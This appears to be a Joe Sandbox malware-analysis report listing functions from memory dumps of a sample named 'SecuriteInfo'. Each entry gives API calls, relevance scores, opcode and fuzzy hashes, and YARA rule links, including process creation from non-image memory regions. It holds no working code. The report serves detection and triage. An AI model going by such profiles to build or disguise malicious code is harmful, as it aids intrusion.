Opcode ID: 8767b5e106ceca6ad5aeed1808d69e2c189d0fdb7c1684d2f904b944e0b7de2d
Instruction ID: 7a510071b2adfe7fafe780683cf7a9ad9806d98c819499c9ec4c97d256f5925f
Opcode Fuzzy Hash: 8767b5e106ceca6ad5aeed1808d69e2c189d0fdb7c1684d2f904b944e0b7de2d
Instruction Fuzzy Hash: 0D4130B6900209DFCB04DFD9D9858EEBBB4FF88214B21855ED816AB710D731AA05CFA1

Function 6CEA8E20 Relevance: 4.7, APIs: 3, Instructions: 162COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6CEA8E89
LeaveCriticalSection.KERNEL32(?,00000000), ref: 6CEA8EAD
_memset.LIBCMT ref: 6CEA8ED2

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID:
API String ID: 3751686142-0
Opcode ID: d04612499f0956959fc8420889f2fada44c65b9d5321612fdcc806669ef47816
Instruction ID: da08bb6941be5f324be0f9ada0d0ccf763d5724508c6aa53d88d28642e9e9e00
Opcode Fuzzy Hash: d04612499f0956959fc8420889f2fada44c65b9d5321612fdcc806669ef47816
Instruction Fuzzy Hash: E6515EB4601249AFC754CF58C890E9AB7B6FF49304F20855DE91A8BB81D731E956CB90

Function 6CEAD9F0 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,?), ref: 6CEADA16
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEADA33
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEADA9E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 3a445bd07a709281174d359037afec8dc14702013b00a9e0542039a81b853f1c
Instruction ID: 922d00cbd6bf6677d43a37fe513c2d157e3cc55899af821fc05d27b32381c396
Opcode Fuzzy Hash: 3a445bd07a709281174d359037afec8dc14702013b00a9e0542039a81b853f1c
Instruction Fuzzy Hash: A6215CB9705206AFE701DFE9C880B9B77B8AF4A718F204059ED04DB740E771DA02CB60

Function 6CEAD920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CEAD949
SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6CEAD96C
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEAD9CF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 6869da3c9ab327ff5acbe3a813068f56103bb2f4ae730dbec20e852f874eedf8
Instruction ID: 6472542c063674cfb4de4e1b8c3905eafb0e78a9e190e727b922b0948fd7301a
Opcode Fuzzy Hash: 6869da3c9ab327ff5acbe3a813068f56103bb2f4ae730dbec20e852f874eedf8
Instruction Fuzzy Hash: 76216D35601214AFEB01CF94C884BAA77B8EF8A718F214098ED45DF344D7B1DA02DBA1

Function 6CEBDB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEBDB2D
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEBDB45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEBDBA2

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$CreateDestroyElementVector
String ID:
API String ID: 3149346722-0
Opcode ID: 0b8fac67461b88815e1a0e34c72b7790bcbfcf1aac41a3625ea0e04ca45d8a0e
Instruction ID: 0ce5edb8eb2cd2fd0955b5ec227a63905096620a2611a321a10e55094bbba9aa
Opcode Fuzzy Hash: 0b8fac67461b88815e1a0e34c72b7790bcbfcf1aac41a3625ea0e04ca45d8a0e
Instruction Fuzzy Hash: 7811B279741205AFD700DF69C889FAABBB8FF5A314F158159E908EB701D730A900CBA0

Function 6CEC3EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEC4042

Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E

__CxxThrowException@8.LIBCMT ref: 6CEC4059

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: b151abd4a183f9ae548fdb0d21ae877e5062cd6b6fffa00aaaa039ffab71a304
Instruction ID: fe127823ea6158e2b1399db89995cffd9adfc480ad7e4c497a2f7737a2ef49a2
Opcode Fuzzy Hash: b151abd4a183f9ae548fdb0d21ae877e5062cd6b6fffa00aaaa039ffab71a304
Instruction Fuzzy Hash: F491C1B19087049FD700CF99C842B9AFBF8EF81344F24895EE4649BBA0D7B1D5058B97

Function 6CEABDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CEABE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6CEABE6D

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: 95f1c80b2cb60f3f3d9f7dbf65ee079c9d3230b1d3f33c157342ec49fd27a7da
Instruction ID: c9766e61b2fed6ddd2592b7126c1853fc67a7b64bec1070e3c0d0980576f095b
Opcode Fuzzy Hash: 95f1c80b2cb60f3f3d9f7dbf65ee079c9d3230b1d3f33c157342ec49fd27a7da
Instruction Fuzzy Hash: 5F71C1B4D0469E5EDB218EB58840659BBB1AF4A22CF3C839CD9E59BBD5C331D843CB50

Function 6CEA62C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEA6466

Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E

__CxxThrowException@8.LIBCMT ref: 6CEA647D

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID:
API String ID: 2299493649-0
Opcode ID: 2a5c5acfd71f79d2c9010e38e7162e7c65c535ae37d70b7b038b703746585abe
Instruction ID: 08c53474baa18dcde90d59a9f2d0353b81ecd9ae29e47f72e17f3a59da49b24d
Opcode Fuzzy Hash: 2a5c5acfd71f79d2c9010e38e7162e7c65c535ae37d70b7b038b703746585abe
Instruction Fuzzy Hash: 955182B29093409FD700CF98C881A9ABBF4FB85744F60496EF5998B750D771D90ACB93

Function 6CEBD2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEBD3E8
__CxxThrowException@8.LIBCMT ref: 6CEBD3FF

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 15b4f938b1fe855f397a43249e17de146f04b9b72f968f0c2fe752f58ad4c56e
Instruction ID: 79d2bafdd5d4cfff059a7357d66d3b030c154c33e1cecb8ef17c299fd4c73bb7
Opcode Fuzzy Hash: 15b4f938b1fe855f397a43249e17de146f04b9b72f968f0c2fe752f58ad4c56e
Instruction Fuzzy Hash: C53150755087059FC704CF28C48099AB7F5FF89714F608A1EF4559B750E735EA06CB92

Function 6CEA8400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEA8449
__CxxThrowException@8.LIBCMT ref: 6CEA845E

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: ae9c3501167a8960a13a6aeb9a2d9479fcce9618276161bfc54f1bc5943c6fec
Instruction ID: 7e1c427898e78fa862489d04af9b8c99680183ce5950966a12e2d5a17c7d161b
Opcode Fuzzy Hash: ae9c3501167a8960a13a6aeb9a2d9479fcce9618276161bfc54f1bc5943c6fec
Instruction Fuzzy Hash: 6301C8755002089FC708DF54D490CAABBB5EF58304B60C1AED92A4BB50DB30EA05CB95

Function 6CEA8D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6CEA8C13,?,6CEA8CD3,?,6CEA8C13,00000000,?,?,6CEA8C13,?,?), ref: 6CEA8D73
LeaveCriticalSection.KERNEL32(?,?,?,6CEA8CD3,?,6CEA8C13,00000000,?,?,6CEA8C13,?,?), ref: 6CEA8D8C

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 533f26d571ec7f42c282856b5b92c12924ab9fa7adc8cb95eae0c37428d5a658
Instruction ID: d2dc5ef1d2102d0b15a1eb7f1f3d68b9ca56af98999727c80a0608587f6c650b
Opcode Fuzzy Hash: 533f26d571ec7f42c282856b5b92c12924ab9fa7adc8cb95eae0c37428d5a658
Instruction Fuzzy Hash: B021FA75200109EF8B14DF89D890DAAB3BAFFC9314B258649F9198B750D731EE16CBA1

Function 06EE0029 Relevance: 2.6, Strings: 2, Instructions: 78COMMON

Download Yara Rule

Strings

Te]q, xrefs: 06EE0077
TJbq, xrefs: 06EE008F

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: TJbq$Te]q
API String ID: 0-3147309840
Opcode ID: 73bba79f6a5d989edb5cbddcc34e609f898bd4d4b7bab879642ab8122023e03e
Instruction ID: e9da1f8dd922aa24b6e3c01ec8cdcf95e3235f4881262519fc4b00d8fa140b53
Opcode Fuzzy Hash: 73bba79f6a5d989edb5cbddcc34e609f898bd4d4b7bab879642ab8122023e03e
Instruction Fuzzy Hash: DE21D330B082945FC716AB7894A56BE7FF6EF86200F1504EAD486DB3D3CA244D09C3B2

Function 06EE0128 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

TJbq, xrefs: 06EE016D
Te]q, xrefs: 06EE0156

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: TJbq$Te]q
API String ID: 0-3147309840
Opcode ID: f98d2fa315ff84da8f1995012a6aa0c24a050b4ecdb206b1df6b37b2969dbb9b
Instruction ID: 0f0ef89fd14e981ea826b5d7a89c1e659131a5d5d7cfe94499fc6443f9fd13ee
Opcode Fuzzy Hash: f98d2fa315ff84da8f1995012a6aa0c24a050b4ecdb206b1df6b37b2969dbb9b
Instruction Fuzzy Hash: FB11C330B002155BCB14AFA8D454ABFBBB6EF88610F500469E505AB3D1CF719D4987E2

Function 06EE0048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

Te]q, xrefs: 06EE0077
TJbq, xrefs: 06EE008F

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: TJbq$Te]q
API String ID: 0-3147309840
Opcode ID: e8a8c489c5071f0c06e32681db31e6f060e228d72fed5bbed405986dd50c5deb
Instruction ID: 42f149dc6f608be5c9e914ac30defa6285363755616c89d1d7057d6aa12e4836
Opcode Fuzzy Hash: e8a8c489c5071f0c06e32681db31e6f060e228d72fed5bbed405986dd50c5deb
Instruction Fuzzy Hash: 3B11AC30B002155FCB18AFAC94996BFBAE6EF88610F500468E546AB3C1CF705E4983A2

Function 06EE0126 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

TJbq, xrefs: 06EE016D
Te]q, xrefs: 06EE0156

Memory Dump Source

Source File: 00000000.00000002.2013627537.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ee0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: TJbq$Te]q
API String ID: 0-3147309840
Opcode ID: 0e495248fd85881d21d5c6d2f8e100525d8196384f90800f60dfbcbecadd7335
Instruction ID: 2bd18f102e7bfd5683e5b1dea5d990905486eb52af3f9bf9c8ecb6992c85ffba
Opcode Fuzzy Hash: 0e495248fd85881d21d5c6d2f8e100525d8196384f90800f60dfbcbecadd7335
Instruction Fuzzy Hash: BD11A230B002155FCB18AFB8D4556BEBBB2EF88610F50046DE546AB3D1CF759D49C7A2

Function 6CEA8BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6CEA6890,?), ref: 6CEA8BDD
LeaveCriticalSection.KERNEL32(?), ref: 6CEA8C23

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: d955e7eb40754b0913a8f735ba06a5a902c48ff748cdc1366487b076acad6f08
Instruction ID: 7d27bc3358d7ac14061b2c87f7f370d8f8941da5af656c30c62166b537b3a6ac
Opcode Fuzzy Hash: d955e7eb40754b0913a8f735ba06a5a902c48ff748cdc1366487b076acad6f08
Instruction Fuzzy Hash: B001BCB1705104AFC750DFA8C88099AF7B8FF8C204720426AE905CB700DB32ED51CBD1

Function 071120F4 Relevance: 1.8, APIs: 1, Instructions: 301processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071123CF

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bd218739705b63e717ebe6ce4eee4d791f8e374336df831dd7d07018a46aec89
Instruction ID: 63cdc6df9223a1b80980853dfed2c528a4b3cae80e823a4ce6f07c531d85dc23
Opcode Fuzzy Hash: bd218739705b63e717ebe6ce4eee4d791f8e374336df831dd7d07018a46aec89
Instruction Fuzzy Hash: 93B116B0E00259CFDB15CFA8C8457EEBBB2FF09304F149169E859AB290D7749985CF41

Function 07112100 Relevance: 1.8, APIs: 1, Instructions: 295processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071123CF

Memory Dump Source

Source File: 00000000.00000002.2014233130.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_SecuriteInfo.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f26c01551de30173f2fa2342f6d5a6e272bf53349a2c223868884375d0d113a0
Instruction ID: fd3932e32f415b2a69a31492cd4d983936f9cf6c7bd1d85e0fe4e69fdd27406d
Opcode Fuzzy Hash: f26c01551de30173f2fa2342f6d5a6e272bf53349a2c223868884375d0d113a0
Instruction Fuzzy Hash: 31B105B0E00259CFDB15CFA8C8457EEBBB2FF09304F149169E859AB290D7749985CF51

Function 6CEBE2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
